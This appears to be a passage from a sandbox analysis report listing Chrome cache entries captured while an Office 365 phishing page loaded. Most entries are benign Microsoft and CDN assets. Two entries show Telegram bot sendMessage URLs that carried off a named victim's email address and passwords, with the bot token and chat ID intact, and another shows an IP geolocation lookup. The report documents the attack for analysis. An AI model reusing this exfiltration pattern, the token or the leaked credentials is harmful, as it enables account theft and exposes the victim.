Entropy (8bit):	7.6596900876595075
Encrypted:	false
SSDEEP:
MD5:	0E176276362B94279A4492511BFCBD98
SHA1:	389FE6B51F62254BB98939896B8C89EBEFFE2A02
SHA-256:	9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
SHA-512:	8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
Malicious:	false
Reputation:	low
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q.....~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1......#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
Category:	downloaded
Size (bytes):	132196
Entropy (8bit):	5.372671085317282
Encrypted:	false
SSDEEP:
MD5:	9053B729DEEF9E0A3952B298C993E251
SHA1:	776A9D792B8C38AD537A563D2E716D65AD5963E7
SHA-256:	555AAF0A4DAACE8F2D49EE1FF0428C7AE3CE4CE229E88EDE1A0C6217FFB2B80C
SHA-512:	E23075E3BB108CC16B29A4A1337BB6CCA56D17434D2CD2643408C0DEE89DAC800BF517FA702D712ED42EDE0E114B878629EC0BDC29D01C3AF81BA2B4B9ADE224
Malicious:	false
Reputation:	low
URL:	https://support.microsoft.com/SocContent/css
Preview:	@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}.HeaderUIFont{font-size:10pt;font-family:'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif;font-weight:300}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.FooterUIFont{font-size:9pt;font-family:'wf_segoe-ui_semilight','wf_sego

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	31578
Entropy (8bit):	7.982885431692689
Encrypted:	false
SSDEEP:
MD5:	ED7F9B571326AD6E974C9A21B2881D31
SHA1:	6318ABCD8BE002C892FD9B306033C64FCE809B96
SHA-256:	852C1EC9D3CEA82ACE52632CDE6A2EB44BA95B1281DCD725D5FBFECD564DA98E
SHA-512:	0E141B50598EA78FD00E7706BE48CCCA3DDD7F44108B42FB217D080B834D61A89B4E3F0D52121A5277F3D39537876AE8B6CCA4E5F55A55CC9CF32ACB86D58B30
Malicious:	false
Reputation:	low
URL:	https://upload.wikimedia.org/wikipedia/commons/thumb/e/e1/Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg/1200px-Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png
Preview:	RIFFR{..WEBPVP8LE{../..$..8n.F. .._.f2...".?...=H.l3M.l..%...-........BM../...kP....oW..&wub.....+S...A..........<........v....}..d..!...D...`C...uas.g6K....v....^4.... .. Ig.\.o.F......8.2.....[..?.(7;7...6.....GDD_........./.m.jV..`..o!._..`......`gt".+5.....8....L.. 6...@..]...[..`...(.....x....,tgx.q#.......1..........uk....\|B.....[...J..y0SA@.q.\rX.Y...<.<c..\.N..Q,...C..I.N.a7.,.\2.Y.c......,<.a..<.\..@H..F..{.....u...3.S3......$...G....." r..cG..u.!A.#..h.O..[.+.....ip.6...x.&.......u...........c?."..9..c.........xv.)S...>.....35.....B7t.`?......f..J.......B...l..'..}....+.......o~{K......89..../a.u...$I.T.'=_.......>....c..$....;.ag"....../..H...G...e...Z.P.S/.64`..W.c......\|L.D.Tq.}eZ@(....5..m.U.ofWjq.Y-.j....jm.....p....A.*(w.m.m....=Sj..^...2.s.&s.....&...I..K...\e..?.E.0.&..f.=.k[Rm...A.<....I.-.a>G......1.zh..Z.j..PMv`..XZ...m[U.y.#%....:.B.T....8dd..A$I...w.....b.vSm.\.......8..<.......]... I..:r...{...,...O"u........aN!+3s.

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	694
Entropy (8bit):	5.557161696687906
Encrypted:	false
SSDEEP:
MD5:	6CE3CBCFB4A0C8CBFB3E834D3D2BC442
SHA1:	3783BB87A681DD57D4B2BE28BD65D160B8808086
SHA-256:	51909580061BDE8E9CE89F714D384DFC666C7C7E049BEECFA6C962FBF5074EDD
SHA-512:	FF96850DDCB3FF13BEA51E5A84D099BCE21A39484A81E5C900C54EE3C0935F519B65AA33DD4452121069F94A3819FF514EB93FBD1BB8BFDF8729710BB2F03ABC
Malicious:	false
Reputation:	low
URL:	"https://api.telegram.org/bot6299120601:AAFjTF1nw1mX4IfZ5iID5kg7WRm_MNdlcuw/sendMessage?chat_id=-801041529&text=%3Cb%3EOFFICE365-HTML-LOGS@ZERO%3C/b%3E%0A[2]%2021/03/2023%0A%3Cb%3EUSER-AGENT:%20%3C/b%3EMozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/104.0.0.0%20Safari/537.36%0A%3Ca%3Esee%20me:%20@mrcew%3C/a%3E%0A%3Cb%3EEMAIL:%20%3C/b%3E%3Cpre%3Evdaponte@sumhlc.org%3C/pre%3E%0A%3Cb%3EPASSWORD:%20%3C/b%3E%3Ca%3Etemper233"
Preview:	{"ok":true,"result":{"message_id":283,"from":{"id":6299120601,"is_bot":true,"first_name":"asgardnewbox_2023LOGS","username":"asgardnewbox_2023LOGS_bot"},"chat":{"id":-801041529,"title":"asgarrd","type":"group","all_members_are_administrators":true},"date":1679409841,"text":"<b>OFFICE365-HTML-LOGS@ZERO</b>\n[2] 21/03/2023\n<b>USER-AGENT: </b>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n<a>see me: @mrcew</a>\n<b>EMAIL: </b><pre>vdaponte@sumhlc.org</pre>\n<b>PASSWORD: </b><a>temper233","entities":[{"offset":154,"length":9,"type":"url"},{"offset":189,"length":6,"type":"mention"},{"offset":219,"length":19,"type":"email"}]}}

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (63888), with no line terminators
Category:	downloaded
Size (bytes):	279220
Entropy (8bit):	6.058071014041615
Encrypted:	false
SSDEEP:
MD5:	5F524E20CE61F542125454BAF867C47B
SHA1:	7E9834FD30DCFD27532CE79165344A438C31D78B
SHA-256:	C688D3F2135B6B51617A306A0B1A665324402A00A6BCEBA475881AF281503AD9
SHA-512:	224A6E2961C75BE0236140FED3606507BCA49EB10CB13F7DF2BCFBB3B12EBECED7107DE7AA8B2B2BB3FC2AA07CD4F057739735C040EF908381BE5BC86E0479B2
Malicious:	false
Reputation:	low
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var a={};function i(n){if(a[n])return a[n].exports;var o=a[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=e,i.c=a,i.d=function(e,a,n){i.o(e,a)\|\|Object.defineProperty(e,a,{enumerable:!0,get:n})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,a){if(1&a&&(e=i(e)),8&a)return e;if(4&a&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&a&&"string"!=typeof e)for(var o in e)i.d(n,o,function(a){return e[a]}.bind(null,o));return n},i.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(a,"a",a),a},i.o=function(e,a){return Object.prototype.hasOwnProperty.call(e,a)},i.p="",i(i.s=3)}([function(e,a,i)

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65451)
Category:	downloaded
Size (bytes):	89476
Entropy (8bit):	5.2896589255084425
Encrypted:	false
SSDEEP:
MD5:	DC5E7F18C8D36AC1D3D4753A87C98D0A
SHA1:	C8E1C8B386DC5B7A9184C763C88D19A346EB3342
SHA-256:	F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
SHA-512:	6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
Malicious:	false
Reputation:	low
URL:	https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.5.1.min.js
Preview:	/! jQuery v3.5.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n\|\|E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]\|\|t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (2867), with no line terminators
Category:	downloaded
Size (bytes):	2872
Entropy (8bit):	5.2233300794694175
Encrypted:	false
SSDEEP:
MD5:	815BE08F616A5FBC214EF097B9C63008
SHA1:	20CF7874FD54C8665EC8144628FB033D76E8067C
SHA-256:	0F60BF1F176081D7C33C63523B457692F7A7FA8EDCD5D0D16B0CE4E8680ECCBD
SHA-512:	BA0269C6ABE139394D12054A157DBD76BA76148C7B8F0362EBADB1D27254CF7A6B2F040BA79BD8C6BB7F09FD22D6D549344003524C6CCA35623CC53AC494AE9D
Malicious:	false
Reputation:	low
URL:	https://support.microsoft.com/css/TopNav/top-nav.css?v=y3fVhNR8laayLSfo-P3Q-CBl74RjRTQT6GeXgXCLJoc
Preview:	.@font-face{font-family:"Support MDL2 Assets";src:url("../Glyphs/SupMDL2_v4_69.woff2") format("woff2"),url("../Glyphs/SupMDL2_v4_69.woff") format("woff")}#topNav{font-family:"Segoe UI","Segoe UI Web","Segoe WP","wf_segoe-ui_normal",Helvetica,Tahoma,Arial,sans-serif;font-weight:normal;font-size:13px}#topNav *{box-sizing:border-box}#topNav .topNavDropdownMenu{display:none;font-size:13px;display:none;left:0;position:absolute;right:0;z-index:1000;width:260px;padding-top:10px;padding-bottom:10px}#topNav .topNavDropdownMenu.activeMenu{display:block;width:fit-content}#topNav a[data-bi-name^=MNU_]{font-weight:bold}#topNav a.topNavDropdownTrigger{padding:11.5px 18px}#topNav .topNav{font-size:13px}#topNav .topNavDropdownMenuItem a{font-size:13px}#topNav .topNavDropdownMenuItem:hover{background-color:#cecece}#topNav .topNavActiveCategory>.topNavDropdownTrigger{font-size:13px;color:#1e1e1e;position:relative;z-index:1001}#topNav .topNavCategory{display:inline-block;position:relative}#topNav .topN

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4873), with no line terminators
Category:	downloaded
Size (bytes):	4873
Entropy (8bit):	5.2268236765669895
Encrypted:	false
SSDEEP:
MD5:	ED927CF0F8A1BE103DF48446270416EE
SHA1:	F7B2BE7FC2B063AAC03E76DF9F3E19D615970213
SHA-256:	EBDD298DFD39A35E5F54469F12953081A17CBEA55F3A4A79C0FD4997D804F7D5
SHA-512:	FCA692C8C7B104FB00C2E6D90C1A0D52A0FF93CDA626338D8FA114A0E9DCE2504DF9282868F98A46648A6E616A96ACD14CAD0460D72477421C8F5EE8F7D34256
Malicious:	false
Reputation:	low
URL:	https://support.microsoft.com/css/MeControlCallout/teaching-callout.css?v=690pjf05o15fVEafEpUwgaF8vqVfOkp5wP1Jl9gE99U
Preview:	.teachingCalloutPopover{position:absolute;z-index:10000;top:45px;width:336px;right:2vw;color:#000;background-color:#fff;border:1px solid #000;box-sizing:content-box}.teachingCalloutPopover .caretArrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.teachingCalloutPopover .caretArrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrow::after{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrowPosition{left:215px}.teachingCalloutPopover .win-icon{font-family:"Dev Center MDL2 Assets";font-style:normal;font-weight:normal;line-height:1;position:relative;top:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#teachingCalloutDismiss,#teachingCalloutMessages{color:#000}.teachingCalloutHidden{visibility:hidden}.calloutMessageHidden{display:none}.caretArrowUp{

Chrome Cache Entry: 123

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (342), with CRLF line terminators
Category:	downloaded
Size (bytes):	1531
Entropy (8bit):	4.797455242405607
Encrypted:	false
SSDEEP:
MD5:	A570448F8E33150F5737B9A57B6D889A
SHA1:	860949A95B7598B394AA255FE06F530C3DA24E4E
SHA-256:	0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
SHA-512:	217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
Malicious:	false
Reputation:	low
URL:	https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
Preview:	a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	downloaded
Size (bytes):	23427
Entropy (8bit):	5.112735417225198
Encrypted:	false
SSDEEP:
MD5:	BA0537E9574725096AF97C27D7E54F76
SHA1:	BD46B47D74D344F435B5805114559D45979762D5
SHA-256:	4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
SHA-512:	FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
Malicious:	false
Reputation:	low
URL:	https://www.w3schools.com/w3css/4/w3.css
Preview:	./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /.html{box-sizing:border-box},:before,:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1576), with no line terminators
Category:	downloaded
Size (bytes):	1576
Entropy (8bit):	5.141392770238462
Encrypted:	false
SSDEEP:
MD5:	505830644E0EEB03349C0142A5C96376
SHA1:	2D773975C260209FCFBBBB21FF12E23BE237F1B7
SHA-256:	9A2DACAA69B83B0479BF5C531E5601D7896361456480AA2399349A966030B8BB
SHA-512:	61CACBA8877890AE418F81302C5F72216AF0D95E2F355363C508383BCDEFD22C142E21310C1D5E2A83AD3E8E0BE9071952214D73A966D5528440FA3D5AB05414
Malicious:	false
Reputation:	low
URL:	https://support.microsoft.com/SocContent/officeShared
Preview:	html,body{height:auto}h2.ocExpandoHead,.ocExpandoBody p{font-family:'wf_segoe-ui_semilight','wf_segoe-ui_light',Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif}h2.ocExpandoHead.macexcel,.ocExpandoBody p.macexcel,h2.ocExpandoHead.maconenote,.ocExpandoBody p.maconenote,h2.ocExpandoHead.macoutlook,.ocExpandoBody p.macoutlook,h2.ocExpandoHead.macpowerpoint,.ocExpandoBody p.macpowerpoint,h2.ocExpandoHead.macword,.ocExpandoBody p.macword{font-family:-apple-system,'wf_segoe-ui_semilight','wf_segoe-ui_light',Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif}h2.ocExpandoHead{border-top:solid 1px #cecece;cursor:pointer;font-size:18px;margin-top:0}h2.ocExpandoHead span{font-size:5px}h2.ocExpandoHead:first-child{border-top:none}h2.ocExpandoHead.opened{background-position-y:69%}h2.ocExpandoHead a{text-decoration:none;padding-top:13px;padding-bottom:12px;display:block}div.ocExpandoBody{display:none}div.ocExpandoBody>p{margin-top:0;padding-left:26px}div.ocExpandoBody p a{color:#2c71b8;font-size

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	694
Entropy (8bit):	5.553630599268126
Encrypted:	false
SSDEEP:
MD5:	BDD40483974AD0A4EABD106667CAD329
SHA1:	4F293784FEFAE7F5009A3BEC7C3A9443FC48695E
SHA-256:	BD84968C122D3784985132217E28E9809E423ED6BD71214A320553A730C5B188
SHA-512:	BBF049906778387726D8C2B772110250C87E85573CE3B707E771453A4025C8D8AE5AD955FB5CE3190275868C9D940AB5E64639271FE6BB51F4710517881C3197
Malicious:	false
Reputation:	low
URL:	"https://api.telegram.org/bot6299120601:AAFjTF1nw1mX4IfZ5iID5kg7WRm_MNdlcuw/sendMessage?chat_id=-801041529&text=%3Cb%3EOFFICE365-HTML-LOGS@ZERO%3C/b%3E%0A[1]%2021/03/2023%0A%3Cb%3EUSER-AGENT:%20%3C/b%3EMozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/104.0.0.0%20Safari/537.36%0A%3Ca%3Esee%20me:%20@mrcew%3C/a%3E%0A%3Cb%3EEMAIL:%20%3C/b%3E%3Cpre%3Evdaponte@sumhlc.org%3C/pre%3E%0A%3Cb%3EPASSWORD:%20%3C/b%3E%3Ca%3Etemeper23"
Preview:	{"ok":true,"result":{"message_id":282,"from":{"id":6299120601,"is_bot":true,"first_name":"asgardnewbox_2023LOGS","username":"asgardnewbox_2023LOGS_bot"},"chat":{"id":-801041529,"title":"asgarrd","type":"group","all_members_are_administrators":true},"date":1679409825,"text":"<b>OFFICE365-HTML-LOGS@ZERO</b>\n[1] 21/03/2023\n<b>USER-AGENT: </b>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n<a>see me: @mrcew</a>\n<b>EMAIL: </b><pre>vdaponte@sumhlc.org</pre>\n<b>PASSWORD: </b><a>temeper23","entities":[{"offset":154,"length":9,"type":"url"},{"offset":189,"length":6,"type":"mention"},{"offset":219,"length":19,"type":"email"}]}}

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65398)
Category:	downloaded
Size (bytes):	139129
Entropy (8bit):	5.444859220439254
Encrypted:	false
SSDEEP:
MD5:	49BFEAE3B40B37A8F951103046309AD9
SHA1:	873A7A11FA10401D6D10005E8DBAD6E58DDB7AA1
SHA-256:	7F5B64709E131C5C20CDB5E3769003FF946C4BEE28852E32C590D2E058127597
SHA-512:	6B4FAF35A9DC0D07C0D4EECAF730A40A8A15662AC6A5886F20E975F1181EF7BF7EBBB3D6DDB4B9AFE1E385B33B8E084E54D5A707378AEC6DCA2C261D2913B03E
Malicious:	false
Reputation:	low
URL:	https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.2.7.min.js
Preview:	/!. 1DS JS SDK Analytics Web, 3.2.7. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var u="function",s="object",le="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],C=null;function b(e){return void 0===e&&(e=!0),C&&e\|\|(typeof globalThis!==le&&globalThis&&(C=globalThis),typeof self!==le&&self&&(C=self),typeof window!==le&&window&&(C=window),typeof global!==le&&global&&(C=global)),C}function S(e){throw new TypeError(e)}function M(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(b()\|\|{}).Symbol,(b()\|\|{}).Reflect;var fe=y\|\|function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},N=function(e,t){return(N=g.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}\|\|function(e,t

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	250
Entropy (8bit):	4.880286917856239
Encrypted:	false
SSDEEP:
MD5:	6A3F795F0177F117E6EBB553F149D215
SHA1:	9CBB868DED202E40E1B6EFBE90EC15913766DB59
SHA-256:	6B49D4E424938A8828B2A155FF0FA364945C3246AE0797BC2FEF9A83823EAFFF
SHA-512:	EF85386CAF2AC7126D082E34ED9F7AF71BCF83C8001A28E56F3374941944011DC3C88D8CADED38787CCFE816009F18DBB1428C68B9F3769F9BEA40119CB45EF0
Malicious:	false
Reputation:	low
URL:	https://ipinfo.io/json
Preview:	{. "ip": "102.129.143.5",. "city": "H.nenberg",. "region": "Zug",. "country": "CH",. "loc": "47.1754,8.4250",. "org": "AS212238 Datacamp Limited",. "postal": "6331",. "timezone": "Europe/Zurich",. "readme": "https://ipinfo.io/missingauth".}

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1555
Entropy (8bit):	3.9986369032270845
Encrypted:	false
SSDEEP:
MD5:	BCB4D1DC4EAE64F0B2B2538209D8435A
SHA1:	4F10568BC1B70BC98D5297B85812C33B3E636766
SHA-256:	A76C08E9CDC3BB87BFB57627AD8F6B46F0E5EF826CC7F046DFBAF25D7B7958EA
SHA-512:	DB41DE25233B7000DD841D244CA2A7504E4B1443A7CF41AA88136764EEB3002B3B99D0E8B31A828AFE4749F454ADCF5D2E4F9F72D645F0A6E66918B5E5A8A7B1
Malicious:	false
Reputation:	low
URL:	https://logincdn.msauth.net/shared/1.0/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path d="M8,0a7.876,7.876,0,0,1,2.126.285,8.011,8.011,0,0,1,5.589,5.589,8.072,8.072,0,0,1,0,4.252,8.011,8.011,0,0,1-5.589,5.589,8.072,8.072,0,0,1-4.252,0A8.011,8.011,0,0,1,.285,10.126a8.072,8.072,0,0,1,0-4.252A8.011,8.011,0,0,1,5.874.285,7.876,7.876,0,0,1,8,0M8,15a6.863,6.863,0,0,0,1.858-.251,7.076,7.076,0,0,0,1.673-.707,6.994,6.994,0,0,0,2.507-2.507,7.076,7.076,0,0,0,.707-1.673,7,7,0,0,0,0-3.716,7.076,7.076,0,0,0-.707-1.673,6.994,6.994,0,0,0-2.507-2.507,7.076,7.076,0,0,0-1.673-.707,7,7,0,0,0-3.716,0,7.076,7.076,0,0,0-1.673.707A6.994,6.994,0,0,0,1.962,4.469a7.076,7.076,0,0,0-.707,1.673,7,7,0,0,0,0,3.716,7.076,7.076,0,0,0,.707,1.673,6.994,6.994,0,0,0,2.507,2.507,7.076,7.076,0,0,0,1.673.707A6.863,6.863,0,0,0,8,15m-.536-3.247H8.536V12.82H7.464V11.749M8,3.715a2.558,2.558,0,0,1,1.038.214,2.737,2.737,0,0,1,1.426,1.427,2.533,2.533,0,0,1,.214,1.037,2.215,2.215,0,0,1-.159.875,2.921,2.921,0,0,

Chrome Cache Entry: 132

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65518), with no line terminators
Category:	downloaded
Size (bytes):	131952
Entropy (8bit):	5.245222429754902
Encrypted:	false
SSDEEP:
MD5:	3D31F4B722BAAAAF922911817D23EB0B
SHA1:	67B66EA9B1D0CA23FAD6407F75B6114739D96CC9
SHA-256:	139092C5F8D46536023B1E564CAEA7D460A14E731D82C31BE4BB80A7E5BAD4B9
SHA-512:	0243BAE79FAA7EF5962BF2E1CBD38585F5A88700883620902452F568C05158C7D1DCE1EA3FD5CC8BF00ECCE6EA4829DCA6A7710D9498D9E16E4137E8D519FAAF
Malicious:	false
Reputation:	low
URL:	https://support.microsoft.com/SocContent/articleCss
Preview:	@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}html[dir="rtl"] .supHomeAndLandingPageSearchButton{right:auto;left:0}html[dir="rtl"] .supHomeAndLandingPageSearchBox{padding:0 18px 0 50px}.supHomeAndLandingPageSearchBoxForm{margin:auto;position:relative;max-width:748px}.supHomeAndLandingPageSearchBoxForm .supSuggestionList{margin:0;padding:0;list-style:none}.supHomeAndLandingPageSearchBoxForm .supAutoSuggestContainer{width:100%}.supHomeAndLandingPageSearchBoxForm .supSuggestionItem{text-indent:0;padding-left:18px}.supHomeAndLandingPageSearchBoxContainer{position:relative}.supHomeAndLandingPageSearchBox{width:100%;height:51px;font-size:1.7em;padding:0 50px 0 18px;border:1px solid #

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1200 x 1172, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	69550
Entropy (8bit):	7.872116071617606
Encrypted:	false
SSDEEP:
